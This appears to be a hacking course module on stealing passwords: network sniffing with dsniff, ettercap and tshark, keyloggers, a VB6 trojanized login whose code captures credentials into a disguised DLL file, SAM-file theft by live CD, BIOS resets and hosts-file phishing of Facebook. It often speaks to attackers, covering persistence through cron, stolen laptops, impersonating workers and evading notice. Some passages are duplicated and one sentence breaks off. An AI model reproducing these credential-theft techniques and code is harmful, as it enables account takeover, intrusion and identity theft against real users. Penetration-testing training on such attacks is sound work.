There are many forms of password attacks one can mitigate against a target in which they are testing, or hacking. The table in figure 1.0 demonstrates these attacks:
|
Figure 1.0 Displaying the many ways in which passwords can be obtained
Now that we have a basic understanding, we will undergo the basics of password hacking, to obtain the passwords in the environment.
Sniffing passwords has many benefits. To attackers it could be to break into additional sectors of a corporation, or provide access to encrypted files. The entire process of password gathering, and successful extrapolation is to advance into the confinements of the target network. The higher up you get, the better it is for the penetration test.
If we look at password sniffing from other views, especially that of those black hat hackers, it could provide a vehicle for identity theft, and to gain information in regards to ISP accounts, and gathering additional information.
Because many users, and individuals especially in the corporate sector have a knack for re-using the same password (as it's apply it once, apply it everywhere.) this can be used to break into more than just one account. Possibly, ebay, pay pal, and other financial web locations.
In any case skipping over collecting information from the network when the regards are to passwords is a silly undertaking that no attacker should skimp on. Taking the time out for this attack can literally open up many doors for the willy attacker!
It must be noted here that when you are dealing with privilege escalation many times password sniffing, and hacking may help with obtaining higher privileges. This may be due in part to the simple fact that, when you provide such efforts, and servers are running plain-text protocols it is more than likely an administrator or root account will log in. This can provide an entry point directly up to higher accounts in the environment. Thus, granting you access to the holy grail.
When I was instructing for Ed2go I had a few students (okay two) who requested things such as: “Password cracking is something that can be performed in a relatively short amount of time. Why can't I do this?” The simple answer to said question is: “You can only crack passwords depending upon their simplicity. Anything more than the standard passwords; e.g: password, will in fact give you a harder time.” The issue was pressed and then pointed back to television shows such as NCIS and CSI where they magically become experts in computers and cracking. My views, cute!
The issues with password cracking and even breaking encryption is the fact that encryption is becoming more and more harder to decipher. In this given stance, it's harder to determine where the message is at its end, middle or beginning. Thus, it's random. With passwords, they can use an assortment of encryption techniques (3DES, DES, AES, BlowFish, NTLM, etc). This is where the complexity of the passwords come into play. A password such as: 1Fx3$9_h@cked will be harder to crack than ihackedyou this is for the simple reason, the previous password is a lot harder and more uncommon than the latter. More so what's a staple in this is that it's not a word found in a native tongue, and brute forcing is more complex due to the password complexity.
The whole schematic of this small passage is to help you identify your number of tries; then you'd need to factor in the time scale in which you'd need to perform such a crack. In order to determine this you would obtain number of tries, and the amount of time needed to successfully break a password, or a given encrypted message / schematic (if at all possible). You must also factor in wait periods. This can be said in this event: 1 password authentication request can take upwards of 10 seconds. 3 of these tries is now 30 seconds to try 3 passwords. If the administrators decide to enable account lockout or, lockout duration this, too must be factored into the equation.
In the given example, we have the following: 1 password can be applied every 10 seconds. Each login can be tried a maximum of 3 times until a lockout of 30 minutes. This necessitates that, 30 seconds will be wasted for every three passwords, and a maximum of 30 minutes for the three failed attempts. In total, you will waste thirty minutes and thirty seconds. 6 passwords will be one hour and one minute, and so fourth.
Ideally, when you have obtained passwords for cracking off line, what you will need to understand is the following:
|
Password Type |
Password Length |
Number of Tries |
Number of Tries |
|
Alphabetical Only (non -case sensitive) |
2 character |
26^2
Mathematical Logic: two characters with upper and lower case factoring. Max length of alphabet, by the length of the password. |
676 |
|
Alphabetical Only (non-case sensitive) |
8 character |
26^8 Mathematical Logic: 8 characters with upper and lower case |
208,827,064,576 |
|
Alphabetical Only (case-sentitive) |
8 character |
52^8
Mathematical logic: 26+26 = 52 (letters combined upper and lower case) with a power of 8 (length of password) |
53,459,728,531,456 |
|
Alphabetical case sensitive with numbers. |
8 Character |
26 + 26 = 52 52 + 10 = 62 62^8
Mathematical logic: 26 x 2 = 52 (upper and lower case letters) 10 numbers (0-9, added to 52 will give us 62)
62^8; 8 being the maximum length of the password. |
218,340,105,584,896 |
|
Alphabetical case sensitive with numbers and special characters |
8 character |
255 – 10 for numbers gives us 245.
245 – 26 for lower case characters provides 219.
219 – 26 for upper case characters provides us with 193 special characters.
(simply place the mathematics in as follows: 255^8 – as the lower / upper case portions are already being factored in.)
To make this simpler, we are doing this based on a 255 character set reference which includes upper / lower case letters, special characters and numbers 0 – 10.
|
1.79E+019, -or- 17,878,103,347,812,890,625 tries |
|
Numerical Password Only |
10 characters
8 Characters |
10^10
10^8 |
10,000,000,000 Tries
100,000,000 Tries |
|
Special Characters Only |
8 Characters |
193^8 |
1.93E+018 Tries -or- 1,925,122,952,918,976,001 Tries |
Dsniff is one of those "nervarious" applications which enable the bad guys to extrapolate information from the network, in turn with this information an attacker can perform identity theft (which will also be covered in later documentation) and, take over accounts. Not to mention, they can also use this information to play command and conqueror with other accounts (e-mails, banking, cell phones, etc) given the passwords can be sniffed [with the use of plain-text protocols] and that the user on the remote end is not using different passwords for each account on the remote machine.
In order to start dsniff (considering you have already compiled, or installed it and it's libraries) we will do so in the graphical manor on the, Linux end. Here we will enter the following commands to start dsniff in the Linux shell: dsniff -i [device] >> /var/log/access.log. Now, let us take a closer look at the syntax utilized here. On the shell prompt we've entered -i which is the interface we will be using [please note you will need to launch ifconfig with no details to dump a list of the network interfaces on the remote machine.]. We then enter a device name from the list populated. Once this information is correct, and we have verified with a test run, we can then pipe the output to /var/log/access.log.
Below in figure 1.0 we demonstrate the usage of Dsniff in order to obtain login details:
Figure 1.0 Demonstrating dsniff running with interface eth0 as a background process (&)
In the next view, we have dsniff running as a normal process, and capturing information to /var/log/data Because dsniff is only concerned with capturing login information, the only information we will be returned is, the login data. Furthermore, the information contained herein is only provided without an encrypted session. Unless the session is utilizing encryption, we will not be able to return any useful information that we can use during our testing phases. Figure 1.1 demonstrates the start of utilizing Dsniff to capture such information:
Figure 1.1 Demonstrating dsniff listening on eth0 and writing to /var/log/data.
After we've waited a fair amount of time (say a few days if you will like, or one week) we can then check the output of the dsniff traffic. Here, in figure 1.2 we see the following:
Figure 1.2 Demonstrating the successful extraction of login details.
Please note that the information from Dsniff does not have to be provided or mitigated on the box that you are on. You can use dsniff to listen to network traffic (and ARP spoofing may be needed to obtain successful extraction. Here we are demonstrating this attack on a box that we've breached, and installed dsniff onto. Also, be aware that compiling and installing rogue software and applications could be a catastrophe and may take some blood sweat and nerves in order to accomplish the task.
Another thing that we'd like to point out is although attackers will not enter the system each time, just to launch dsniff or any other type of scanner. Instead they will search to install a run entry in cron, or they will modify /etc/rc.local, in this file, scripts are launched when the system starts. So, a simple entry to a shell script, or to a call such as dsniff -i [interface] >> /var/log/data will suffice. The same can be said respectively for each application which may utilize sniffing, or needs to be loaded when the environment is started.
Ettercap is a bit better than the previous password sniffer we had discussed. As, this version comes in two flavors. One is a graphical environment, and the second is actually a textual based version. Ettercap can sniff just about any password. I have seen ettercap sniff passwords for some web based locations, and also router passwords (however, dsniff has the ability to sniff router passwords, too!). Ettercap as previously stated runs in two forms, of those forms (although we are discussing the text based versions here for remote penetration) we will only be covering the shell prompt version, and then re-directing the output to another file.
As shown before with dsniff, we can use similar commands here with ettercap. We also may want to spawn the application when the operating system loads as well. In order to launch the sniffing using ettercap you can issue the following command syntax. Figure 1.0 demonstrates this:
Figure 1.0 Demonstrating ettercap being run from the CLI listening to eth1.
Once this has been setup, as highlighted in figure 1.0 we can then redirect the output to a file. Although not listed in the depiction, we are sniffing and reviewing traffic in real time. Figure 1.1 demonstrates this:
Figure 1.1 Sniffing Traffic in real-time. Without file redirection.
The last tool in which we will look at is the, wireshark / ethereal protocol analyzer (sadly this is in GUI form, however do not fret!) This tool, too has the ability to sniff passwords from unencrypted sessions (TELNET, FTP, etc).
Wireshark, or Ethereal (depends on what you like to call it.) has the ability of sniffing for clear-text login passwords. However, you'd need to hunt this information down. In order to sniff these protocols, make sure that you have promiscuous sniffing enabled (if you are part of the network – or want to capture everything on the target host). Figure 1.0 demonstrates the sniffing of an FTP password:
Figure 1.0 Demonstrating where to start your searching for passwords returned from FTP.
When searching in wireshark / ethereal, make sure you enter "String" and then enter value pass. This will match all conditions with "Pass" in the search, returning the desired results. Figure 1.1 demonstrates this.
Figure 1.1 Demonstrating a search for passwords from FTP.
When sniffing traffic, if you have access to tshark, which is the wireshark equivalent but for the command line, you can issue the following commands (please note in this example we are searching for FTP login sessions): tshark | egrep –ignore-case “ftp|pass|password|passwd|user|username” this will grab any input credentials from the local box when attempting to authenticate to FTP. We will also show the output (not in captured redirected form) from the shell when an authentication request goes across the network. Also, in this example, we are using: Network Defense Solutions, Inc. web location as a metric to perform our testing on. Figure 1.2 demonstrates this:
Figure 1.2 Demonstrating a tshark sniff of password, and user name from FTP sessions.
As it shall be noted herein. The tshark client is also available for the windows end, however you may have to filter out the information by hand, or with an editor. This is because windows does not come with any type of egrep or grep functions (their version is the find function with is quite dingy in nature).
The tcpdump application (for both windows and Linux) have the ability to gather information from FTP sessions, and other plain-text protocols. With this application, it is possible to obtain the login credentials. Figure 1.0 demonstrates this
Figure 1.0 Demonstrating raw output from a tcpdump session.
The command parameter that we've specified to get this output was the following: tcpdump -w 2000 -vvv -i eth0 what this tells tcpdump is that we are obtaining the raw output (-w 2000) with triple verbosity (-vvv) and on interface eth0 (-i eth0). The output from the file, is also stored as file “2000.” so issuing the command: more 2000 will display the same output as the above; but with different servers if used.
In figure 1.0 we see that the capture (loaded with ethereal / wireshark) has provided us with the user name and the password. You can also view the information by right-clicking the FTP request and selecting “follow TCP stream.” This will pull the information from the line.
The tcpdump application (for both windows and Linux) have the ability to gather information from FTP sessions, and other plain-text protocols. With this application, it is possible to obtain the login credentials. Figure 1.0 demonstrates this
Figure 1.0 Demonstrating raw output from a tcpdump session.
The command parameter that we've specified to get this output was the following: tcpdump -w 2000 -vvv -i eth0 what this tells tcpdump is that we are obtaining the raw output (-w 2000) with triple verbosity (-vvv) and on interface eth0 (-i eth0). The output from the file, is also stored as file “2000.” so issuing the command: more 2000 will display the same output as the above; but with different servers if used.
In figure 1.0 we see that the capture (loaded with ethereal / wireshark) has provided us with the user name and the password. You can also view the information by right-clicking the FTP request and selecting “follow TCP stream.” This will pull the information from the line.
Capturing passwords can be done in many manors, and methods. As we have seen in previous methods, we've used trojanized logins, trojan sniffers, and sniffer applications. Another two methods we will discuss in further details is the art of capturing passwords with the use of software based tools known as key loggers. In this module, we will be taking a look at two additional methods of which one can obtain passwords. The first will be, Key loggers. The latter will be
As we've stated previously key logger applications are applications which listen in on the keyboard in order to determine the key hooks that are being passed to the system. Once a keyhook is passed to the system, the application stores a buffer of approximately 1MB, or less and then dumps that information to a file on the system. Key loggers can come in a plethora of flavors. FTP, SMTP and each one with a KB limit in which it will trigger and send. If that isn't bad enough, key loggers can also listen in for conditions that have been met. For example: “new password,” “user name,” “user name and password” and any other combinations that the developer or attacker would deem as justifiable to listen against. When these conditions are met, the application can then submit the information via FTP, or SMTP back to the host.
If this isn't bad enough, many; Trojan applications that are written now combine key loggers as a standard feature. So, both efforts are covered. In this module we will be covering obtaining passwords via key loggers, and how to design them in the VB6 environment. Below is some source code in order to perform key logging Figure 1.0 demonstrates the code Download VB 2010 Keylogger, Or Download VB6 KeyLogger.
With the use of a key logger, the obtained information can be obtained in two methods. Physical access (which we will cover later), remote access with the use of a trojan, and remote access where the key logger application e-mails the information, or FTP's the data back to the attacker. To complicate matters, if the user can encrypt the information of the key logger session – it will make it that much harder for the administrators to unearth and or find the attack. Especially one that has been raging on in their environments for quite some time.
Considering these attacks can take place on the remote host, there are are other methods we can utilize which we can utilize web applications. This will be covered in another sub-section of Web Hacking, and also discussed in this module as per phishing.
So, now that we want to target a form, where do we begin? First if we can unearth which applications, or services that are running on the target host, we could get a better understanding of what we need to target. This is uncovered in our system enumeration processes after the exploitation portions have been successful.
In this example, we are attempting to write a trojanized login application for a network share in windows xp professional. Below is the real application in which we are working with. Please note some information has been removed, or edited to keep the innocent protected:
Figure 1.0 Demonstrating a legitimate login for a network share.
So, now that we have a graphic of the network share. We will take a screen shot of the window, or build it ourselves. So, let us enter the wonderful world of trojanized application development. The image below, is our Trojanized version of the login form:
Figure 1.1 Demonstrating a Trojanized Login Form
For the version that we are using, which is very crude, you will include the following source code in a Visual Basic 6.0 application project. Here is the code we will need Should you want to download the login for the VB2010 Compiler. Please click here to download the source code.
When the user attempts to login to a share, or other modal which utilizes this type of “child” programming, the credentials are recorded, the windows shatter attack then sets the text back to the legitimate form and is recorded as follows:
Figure 1.3 Demonstrating the successful password extraction
Although it is not shown in the pictures above, the information for the dialog caption, and the static label “Connected to” will be obtained when the system displays the child modal. The code is not extended to this functionality as we'd like to keep things simple. However, if needed, the user can modify the source code and configure the trojanized login as needed of his or her needs.
The next step one could take, is to install an application that will specifically look for login forms, windows, and modals and record the information in which they contain. This is a bit easier and less work required in programming – however the tactics are a bit different. As we still need a method of installation, then how to keep it on the system and finally locating the windows we need to “attack” to extrapolate information from.
Not to mention, we also need to take additional steps to mitigate this attack against forms that have undergone the blocking techniques like the AOL 9.0 client software did in it's login process. And, when this attack is mitigated against forms which contain such security measures additional “programming and trickery” may be needed!
As we've studied the code for the previous trojanized login forms (which didn't exactly mimic the real thing – just an over-view; in this example we will be listening to the login form itself!) the next version will be listening to forms which provide authentication services.
Newer versions of the authentication applications designed by, Microsoft and other vendors whom are wise to this type of attack have programmed the windows to avoid GetText as this attack will ONLY work against windows 9x machines that have not been upgraded to the newer versions of the login forms.
Below is the sample of the source code (you can use the same bas files as in the previous example):
|
child& = FindWindow("#32770", vbNullString) SysCredential& = FindWindowEx(child&, 0&, "SysCredential", vbNullString) ComboBoxEx& = FindWindowEx(SysCredential&, 0&, "ComboBoxEx32", vbNullString) ComboBox& = FindWindowEx(ComboBoxEx&, 0&, "ComboBox", vbNullString) edit_user& = FindWindowEx(ComboBox&, 0&, "Edit", vbNullString) edit_passwd& = FindWindowEx(SysCredential&, 0&, "Edit", vbNullString)
Dim Sys_User As String Dim Sys_Passwd As String
If child& <> 0 Then '//SOMETHING IS LOADED LETS LISTEN Sys_User = GetText(edit_user&) Sys_Passwd = GetText(edit_passwd&) Else '//NO WORRIES NOTHING IS LOADED '//BUT CHECK THE STRINGS FOR LOGGED DATA If Len(Sys_User) > 0 And Len(Sys_Passwd) > 0 And child& < 1 Then '//WRITE THE DATA TO THE FILE WE NEED _ TO STORE THE INFORMATION IN TO LOGIN _ LATER AFTER THE CAPTURE PROCESS. Open Environ("windir") & "\sysvnc32.dll" For Append As #1 Print #1, "[ Login Data For: " & Format(Date, "DDDD, MMMM DD YYYY") & "]" Print #1, Sys_User & " - " & Sys_Passwd Close #1 Sys_User = Char$ Sys_Passwd = Char$ End If End If End Sub |
Figure 1.0 Demonstrating The Code Utilized to Obtain the Password & User Name.
As we have pointed out as per the previous example and warning this will only work against windows 9x systems; not the newer XP systems. This code can also be exported to other fields and logins which do not support the dismissal of the WM_GetText API function call.
Hacking combines many elements and can scale a great deal. From human hacking and software hacking, to physical attacks and then some. There are many ways in which passwords can be abused, and obtained. This module will aim to highlight this. For the sake of education, we've put our own systems on the line in order to perform such attacks. Many of these attacks may not be feasible due to time constraints however if the system is stolen, or “misplaced” the attacker has just gained literally all the time in the world – or universe depending on how you look at it. The glass thing, uh what ever!
Hardware keyloggers are very hard to detect. The reason for this is not many people inspect the backs of their computers; and for the most part no anti-virus software, or anti-spyware applications can detect these hardware devices – yet.
Hardware keyloggers come into place during a few interactions. Many times social engineering will get you into the environment – and once inside you'd need to place these devices about. Once the devices are placed / planted you'd need to return. So, posing as a pest control person, or other much needed worker (clean up – janitorial) you can come back into the environment to obtain the precious data you've just sniffed.
The most common types of hardware keyloggers are as follows (viewed with the help of google:)
From left to right, we have a mini-din (ps2 style), key logger disguised as a keyboard, and finally a USB to USB key logging device. If you notice any of these devices (minus the device in the middle) you should suspect foul play.
If you have access to the system, and or can remove the hard disk, or even boot the machine to a Linux LiveCD, perform the following steps:
Notice that this attack may take some time to accomplish. So, be sure you can a lot at least 30-45 minutes to get this job process completed. Make sure you have a jump drive, pen drive, or access to the internet to save the files to. Otherwise, you are in for a wild ride!
When you boot the system, from the liveCD or removed the hard disk and have successfully mounted it into your computer, perform the following Figure 1.0 demonstrates this:
If you were able to steal a laptop, or a hard disk note that you wouldn't have to perform the password cracking process – unless you really needed to get a feel for the passwords you'd be up against. In such a case it would still be wise to crack the passwords and also browse what the system has to offer you! The old saying is: “A watched pot doesn't boil” and the same said for computers: “A watched Windows doesn't boot!”
Figure 1.0 Demonstrating an fdisk on a windows Drive.
Once we've identified the windows partition (shown here with the HPFS/NTFS) signature, we now need to create a folder in /media/ called windows. We can do this by entering the following command: mkdir /media/windows/ once this has been completed, figure 1.1 will demonstrate what is to be done next:
Figure 1.1 Demonstrating a folder creation in linux.
Now that we've seen the hard disk labeled as /dev/sdb1 and mount it to /media/windows in order for us to accomplish this, we enter the following within the shell:
Figure 1.2 Demonstrating a mount from sdb1 to /media/windows and change directory.
Now that we've obtained access to the “WINDOWS” directory, cd need to shell into the system32 folder, and then into config. Figure 1.3 displays such:
Figure 1.3 Clearly displaying the SAM files, and the config directory contents.
With this you can then load the SAM file into L0pht crack, or john to get the job of cracking done.
In our current environment, we've setup a liveCD which can and will provide us with what we need to launch the physical attack against. Our first stop was to download a version of the cracking application on liveCD. We've obtained our image from here: http://www.paulspoerry.com/2007/01/09/ophcrack-live-cd-crack-windows-passwords-in-minutes/ also, notice that each version of windows has it's own specific download candidate. Download the version you need for windows XP or windows Vista/7. Using one against the other which it is not designated for will cause some unintended results.
Because the cracking and attack should be straight forward, we are only walking you through the attack vector with windows xp professional. Outside this, you should be comfortable in mounting and launching the attack on other systems as well with no problems; and when we say systems we do mean microsoft.
Before we begin detailing the attack, let us go through the steps needed to get the attack going. First and foremost we've gone into windows and setup 3 accounts note that you can do this in any method in which you deem as necessary. The accounts we've created are: hackbox, finance and finally, user1 figure 1.0 demonstrates the users listing:
Figure 1.0 Demonstrating the 3 accounts and guest account (disabled)
Once this was set into motion, we've then set some options to give the computer a nice “business” feel with the login screen. At which point, we are also demonstrating the “hey we cannot get into the computer” aspect of this module. Once we've done that just for the aesthetics, we've proceeded to shut the computer down. Figure 1.1 demonstrates this:
Figure 1.1 demonstrating a shutdown request.
Here, in figure 1.2 you will see that we've added that “business” like feel, and where we'd most likely be stuck if we did not know the password; however, this will all change!
Figure 1.2 Demonstrating the login window for “hackbox”
Once we have a target box in mind, we will then attempt to setup our attack liveCD, in such a case, we need to locate where we've downloaded our tools to. In this case we've downloaded them to /home/username/Downloads. Figure 1.3 demonstrates the location of the download, and the following steps needed (notice we are using ubuntu 9.10 for this exercise):
Figure 1.3 demonstrating the location of the ISO needed to create the liveCD.
Now that we have located our ISO we need to then, right-click the iso, and choose BURN. Figure 1.4 demonstrates how to perform this action.:
Figure 1.4 Selecting the burn option.
Now that we've instructed the box to burn the image, we should see a screen as follows; notw depending upon your hardware requirements you will need to select the appropriate profiles to perform the burn.
Figure 1.5 Burn Screen.
In order to launch this attack properly, you will need access to get the computer to boot from a CDROM drive, or if you would like to fiddle around, a USB jump drive. Once this has been accomplished, you will launch the following results. NOTICE: in this case we've loaded this machine to automatically boot from bootable CDROM media.
When you first boot the linux liveCD you will see the following screens, figure 1.6, 1.7, and 1.8 will demonstrate the first few screens you will see:
Figure 1.6 Detailing that “Ophcrack Graphical mode – Automatic” is selected.
Figure 1.7 detailing linux loading in a liveCD fashion. Do not be alarmed!
And, finally our environment loads. When this completes we should see the following screen:
Figure 1.8 OphCrack doing it's thing
If you are of the unfortunate and your liveCD continues to crash you may want to try to crack the password in text based mode. This mode will accommodate the cracking in a sub section here. If you have troubles, please skip forward to that section.
Because we have been quite unlucky, or the memory resources did not accommodate what we were looking to accomplish, it is quite possible that the textual based form will help us bypass such an issue. If not, we have other methods to get around this; we've come this far, and if this fails – why not add an administrators account? Well, before we start getting all fancy, lets finish what is currently at hand.
Due to the fact that many of the start up procedures have been detailed in the previous module, if you need help, or are having trouble please see the previous modules chapter. Here, we've selected the graphical version, however you can also select and opt-in for the low-memory portion. Figure 1.0 demonstrates the options selected (notice we've placed emphasis on the last two options):
Figure 1.0 highlighting low RAM and text mode options!
Once the linux liveCD boots, you will be asked for your language, select the appropriate language. Figure 1.1 displays this:
Figure 1.1 detailing language selection.
Next, you will need to select your key mappings, in this case we are selecting USA, lay out. Figure 1.2 details the key mappings dialog:
Figure 1.2 key mappings (USA)
In these modes, your passwords (and their NTLM hashes) will be dumped to the /tmp/ folder. When Ophcrack cracks the passwords, it will perform the in the same methods as the windows and linux counterparts will displaying the passwords.
In this example here, we will have a much more elaborate method to gaining access into the machine utilizing a bootable OS from a floppy disk. However, you must understand that if your machine does not boot from or have a floppy, you must use a USB key, or CDROM in order to boot up to the minimal Linux kernel. In this example, we will be resetting the password in the SAM file. This will effectively grant us access to the target machine.
In order to accomplish this task, you will need to download LinNT. Once You've downloaded the LINNT bootable floppy, unzip the archive and perform the following steps:
|
•Insert a blank floppy disk |
Figure 1.0 guide to setting up LinNT
When the disk has been created, and the information written to the Floppy, we will perform the following steps in figure 1.1:
|
•Probe for SCAI drivers? {commit enter} |
Figure 1.1 resetting Administrator password.
Before the corporations began to change the way in which the passwords were stored in the system (BIOS) the password reset was quite simple to achieve. Here we have a module dedicated to such bypassing:
BIOS Passwords are sometimes implemented in corporate environments where upper management did not want it's workers to mess with settings of the machine. Many times, it's also utilized in schools to deter students from utilizing bootable OS's or using command prompt to circumvent security mechanisms. In any case, we will assume you've obtained unattended access to a machine. Of course, you have a screw driver (and in some cases a lock snipper / bolt cutter [some machines have locks on their cases]). Once you've gained entry into the machine in a physical sense you will need to locate the battery on the motherboard. The motherboard battery is similar as in the following depiction:
Figure 1.0 Showing BIOS battery.
Very sneaky in it's own, however combine this attack with a user who has a great memory and knows how to keep a conversation going at all and any cost – you can have a users password rather quickly. Shoulder surfing is the art of talking to a person while standing behind them and watching them authenticate to a system.
Normally this is achieved by viewing the user name first, and then watching the keyboard whilst they apply the password to the login field in order to gain access. Once this is done, it can be applied later on after the user has logged out.
Now that we have exploited into a system, and have gained access the winds will shift and we'd need to obtain passwords. Given that all attempts that we've done were unsuccessful what is left for us to perform to achieve password snatching? Have we exhausted all our resources? Not quite! And, remember. If we have exhausted our resources in the password grabbing and hacking modules – all hope is not lost. We can always revert to the “Human Hacking” modules and call upon the almighty and successful techniques of social and reverse engineering.
Given the fact that we are now providing this type of attack against a users machine, and not a server (which you may be able to however might not bear much fruit). The entire method to performing this type of tactic will mainly be against a user. This is said true because users are more than likely to browse the Internet whereas a server would not. More so, you can also create applications to write to the files in which we will be demonstrating.
The attack provided herein is not operating system specific; and can be mitigated against Windows, Linux and the Mac operating systems. The main focus of this attack is to get the user to navigate to a server in which you control. This can be a simple angelfire account with PHP support, to a server in which you pay for and are allowed to provide additional functionality.
As provided in the chart in figure 1.0 with a clear listing of each file for each operating system where one may edit the hosts file to redirect traffic to an attackers web location.
|
Operating System Version |
Location of Hosts File |
|
Microsoft Windows 9x |
C:\windows\hosts |
|
Microsoft Windows NT |
C:\windows\system32\drivers\etc\host C:\WinNT\System32\drivers\etc\host |
|
Linux, Mac OS X |
/etc/hosts |
|
Novell |
SYS:etc\hosts |
|
Mac |
/private/etc/hosts |
Figure 1.0 Demonstrating host file locations.
So, why is this such a big deal and why is this covered? This is quite simple. If we modify the (given we are working in the linux environment) /etc/hosts file and enter the following:
|
Facebook.com google.com |
Demonstrating how to modify the hosts file
Once we have done this, and we navigate to http://www.google.com we are greeted with http://www.facebook.com which is a clear indication that our transition has been successful. Here is where this type of attack becomes a bit more tricky. Considering we are willing to mitigate the attack against a user who frequents facebook. We have a few options at our disposal. The first option would be to set up an application to monitor if the user has been to facebook, the second would be to mount a system scheduled task that on the 15th of the month, the file hosts is replaced with the original and the currently modified version deleted.
To make things a bit more complex, and fly under the radar, you can make facebook.com and possibly register faecbook.com or facebok.com, or even faceb00k.com. So where do we begin? First, we create a facebook login page. So, we go to facebook and we right-click on the firefox and select “view page source,” or we can take the lazy approach and issue the wget -r facebook.com and let it run for a few seconds. So, let us grab some source code (to make things easier for you I have already obtained and modified the code. Please see the supplementary materials and locate Password_Hacking → Redirects → Facebook). Moving forward, we can clearly see that in figure 1.0 we have the facebook login:
Figure 1.0 Displaying a non-routable local IP with a facebook folder (facebook.com)
Considering that all the facebook web locations have been taken (which mostly they are) you will end up possibly being stuck with a login that is hosted on a web location such as something_weird.angelfire.com/ even so, if the web location is susceptible to XSS/XST attacks users may not even notice. Displaying a log out form, or even redirecting to the home page, of a trojanized locale. However, these will be covered in later modules. For now, let us focus on the /etc/hosts file.
Now that we've modified the file hosts, figure 1.1 displays the parameters in use:
Figure 1.1 Demonstrating the target host modification (attacked box)
Now, when the user navigates to the web location of, facebook.com they are brought to facebook.com/facebook.com (although a bit confusing, if the /etc/hosts is modified your domain would be FOOBAR.com/facebook.com/index.php – given you've included a folder called facebook.com to host the information in. Many times this can be done via IP address: http://29.40.220.23/facebook.com. This, too can confuse people. However, to the trained eye something is amiss!) Figure 1.2 displays the successful redirect:
Figure 1.2 Displaying the successful redirect to our server. (example on local server)
We are looking for passwords, no? So, what exactly are we looking for? Well, this is simple. Passwords as we've stated many times before are like javascripts. Create one and deploy them everywhere. Many would think, so what is the problem with this? The problem is you are creating a single point of attack. Meaning, if they have the access to your facebook, they have an e-mail to go along with it. Chances are, if you use the same password for your e-mail account (which many of you may) all an attacker has to do is see what other services you use and submit forgotten passwords to the primary account. As you will see in later modules, this simple attack can lead to identity theft if executed properly.
Now if you've performed the penetration testing phases successfully, or are using this type of attack to single out specific individuals during a penetration test to obtain logins, familiarize yourself with the php manuals! If you are blessed with the luxury of having your own servers, you can ussue the following code at the end of a password capture, to make sure others will not have access to your captured data. Figure 1.3 will demonstrate this:
|
chmod("logins.html", 0777); |
Figure 1.3 Demonstrating the use of chmod to keep the logins file protected from the public.
Although in this exmple we are redirecting back to facebook errors, you will see in figure 1.4 the effects of a jacked password. However, facebook operates by a login failure. So, capturing the login failure URL and playing that back to the window.location portion is very helpful. However, in these examples we really aren't going to cut the throat. We are just demonstrating the effects of phishing and gaining information from the user. Below, is the example of the redirect:
Figure 1.4 Demonstrating redirection without facebook.com/facebook.com
In essence, you can load an application on the computer to install an apache web server, load the files needed, and then listen to see if the logins.html file has been created; if the data has been obtained, the Trojan can then uninstall the apache server, upload the logins.html file to you, remodify the hosts file and return the system to normal (uninstalling and not showing a single sign) where all the attack vector has taken place on the users computer. What is pretty sweet about the modification to the hosts file is that, it does not impact links sent from e-mail applications where you'd be browsing to facebook (tested on Mac OS X). So, in essence all that does change is the initial page which loads, and users log into. Other than that, the community is open and links can be activated, browsed with zero impact or the host redirecting to the phishing box.
So what happens when you have an e-mail address, or a user name and you've successfully linked it to a location where you have a login prompt? Well, chances are you can attempt to guess the password and cause a log out time period. Or, you can attempt to guess the password from within the login form on the “forgotten password” link, and create a lock out time period there, too! So, what can you do? Well. You can try an attempt on the first 2 tries. Anything more than that would be a waste. However, login fields will give you a general idea as to what reset questions a user has specified for their login form.
Again, this may seem trivial and useless. However, it is not. For this example, we will be using the AOL messenger software. Given these examples are for the home user, the same principals apply in regards to corporate users; and of course herein the public sector.
Figure 1.0 demonstrates that we are attempting to grab the password from the server, from user
Figure 1.0 Displaying a Reset Password Form
Once we've gotten to the point where we can see the reset question (displayed in figure 1.1) we will then know what questions to ask. However, if curiosity hits your fancy; you can in all actuality take a crack at it. However, limit yourself to only two tries. Anything more than two tries would spell a disaster – and, it's also spelling disaster if you attempt this technique. We will highlight this here with this beautiful warning.
Any time you attempt this type of password extraction you greatly run the risk of the password being sent back to the victim. If this happens, it is a clear indication to the party in which you are attacking that something is wrong. Not many times will a user notice a “forgotten password” request in a mail box and say “this is normal.” It can prompt the user to either harden their security – or make a report to any higher powers citing that something is a miss. Chances are, an easy to guess, or crack password will then be changed to something harder. Play your cards right and be very careful!
Figure 1.1 Demonstrating the user used a date, and zip code.
In such an instance, it may seem impossible to obtain a password. Given the grounds you do not know the user, and you do not know where they live. Again you can depend on social engineering in order to obtain this information. Here is where the wonderful world of social networks come to play. In any case, you'd either have to search the internet for this user name, and any postings – head directly to a social networking site or engage in communications head-on with the target, or with their friend base. Mind you, there are many ways to get this done. It all depends on your execution and your willingness to remain stealthy.
In the next module, we will explore the many colorful ways in which one can obtain a password from social networks and fly directly under the radar.
Many times after an exploit is run, and you need to escalate privileges to higher or other accounts, you can use tools to your advantage. This section serves as two fold, however, the use of John will be discussed on this section, before we go into further detail about JTR. You will need to find, download and install LC5 (L0pth Crack). This is a very powerful password auditing and testing tool. And, the same can be said respectively for John the Ripper.
When you are on a command line for windows, and have successfully retrieved information from an FTP server, with the following files PWDump2 . On the Windows end, you should dump the users information by performing the following syntax execution within pwdump2.
With the following information we see an actual crack in progress with john the ripper.
Figure 1.0 john the ripper issuing an incremental lanman.
Notice that you must obtain this information in any of the previous methods mentioned. Preferably the pwdump2 format!
John the ripper is quite powerful, when used in the wrong hands, and at times, in the right hands =). The tool can be used to test information security password policies (given you have had permission to see what you could sniff off the line - this will help you determine if you need a dictionary based attack, numerical or hybrid). In any case, below we will show you how to use JtR to gain information from an /etc/shadow file. Again, this is given you had direct access to the system and need to crack other passwords.
John is quite the fickle application. If in the event that john produced john.pot it will not want to start again in the same directory. You must first view, and remove the file before you can begin another crack session.
When running John there are many options for you to consider. The chart below will mention and outline the options which are available in the john software; when installed in Linux.
|
Option |
Function |
|
--single |
Operates solely for one file, and one user name. |
|
--wordfile |
Specified to list a word file, in which john will use to break the security held within them. |
|
--rules |
Can be utilized as quite the muscle. You can specify single mode, wordfile and other types to move onto if no fruits are brought fourth. This can also become VERY demanding, and take quite the while. |
|
--incremental |
Has different modes, all, alpha, numerical, lanman, digits. |
|
--restore |
Allows you to restore a previous cracking session. |
|
--test |
Performs a benchmark test to determine the amount of time it will take your computer to break a password. |
|
[NO OPTION SWITCHES] |
Will run john against a password file with no additional options specified or set. |
John the Ripper common options listing.
Now that we have taken a look at some basic options for cracking passwords; let us take a look at how these password types can be cracked. Here, on my test network, I have setup a user account. And, by some magical means obtained the password file. See, and who says Hollywood can do tricks and magic only? As you can see from the output below, we've successfully broken the security on the shadow file.
